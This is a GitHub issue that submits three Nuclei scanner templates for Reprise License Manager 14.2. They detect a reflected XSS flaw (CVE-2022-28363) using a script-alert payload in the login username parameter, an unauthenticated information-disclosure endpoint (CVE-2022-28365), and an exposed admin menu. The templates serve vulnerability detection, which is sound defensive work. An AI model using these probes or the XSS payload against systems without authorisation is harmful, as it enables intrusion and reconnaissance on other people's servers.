### ISSUE TITLE
RLM unauth - CVE-2022-28363 - CVE-2022-28365

### ISSUE THREAD

**Issue by Akincibor** [projectdiscovery/nuclei-templates#4096]
### Nuclei Template:

CVE-2022-28363

```yaml
id: CVE-2022-28363

info:
  name: Reflected Cross-Site Scripting (XSS) in Reprise License Manager 14.2
  author: Akincibor
  severity: medium
  description: Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.
  reference: https://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html
  tags: xss,rlm

requests:
  - raw:
      - |
        GET /goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1
        Host: {{Hostname}}:5054
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 38
        Origin: {{BaseURL}}:5054
        Connection: keep-alive
        Referer: {{BaseURL}}:5054/goform/login_process

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '<script>alert("1")</script>'
        part: body
      - type: word
        words:
          - "text/html"
        part: header
```

CVE-2022-28365

```yaml
id: CVE-2022-28365

info:
  name: Information Disclosure in Reprise License Manager 14.2
  author: Akincibor
  severity: low
  description: Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.
  reference: https://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html
  tags: xss,rlm

requests:
  - raw:
      - |
        GET /goforms/rlminfo HTTP/1.1
        Host: {{Hostname}}:5054
        Accept: */*
        Connection: keep-alive
        Content-Length: 0
        Origin: {{BaseURL}}:5054
        Referer: {{BaseURL}}:5054/home.asp
    
    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "RLM Version"
        part: body
```

RLM unauth

```yaml
id: rlm-unauth

info:
  name: Unauthenticated Reprise License Manager
  author: Akincibor
  severity: critical
  description: Unauthenticated Reprise License Manager.
  tags: unauth,rlm

requests:
  - raw:
      - |
        GET /goforms/menu HTTP/1.1
        Host: {{Hostname}}:5054
        Accept: */*
        Connection: keep-alive
        Content-Length: 0
        Origin: {{BaseURL}}:5054
        Referer: {{BaseURL}}:5054/home.asp
    
    redirects: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Logins disabled"
          - "RLM Administration Commands"
        condition: and
        part: body
```

<img width="1162" alt="Capture d’écran 2022-04-10 à 03 23 39" src="https://user-images.githubusercontent.com/99909324/162597157-7e17cbdf-4710-4689-8b44-ce5d202754ef.png">
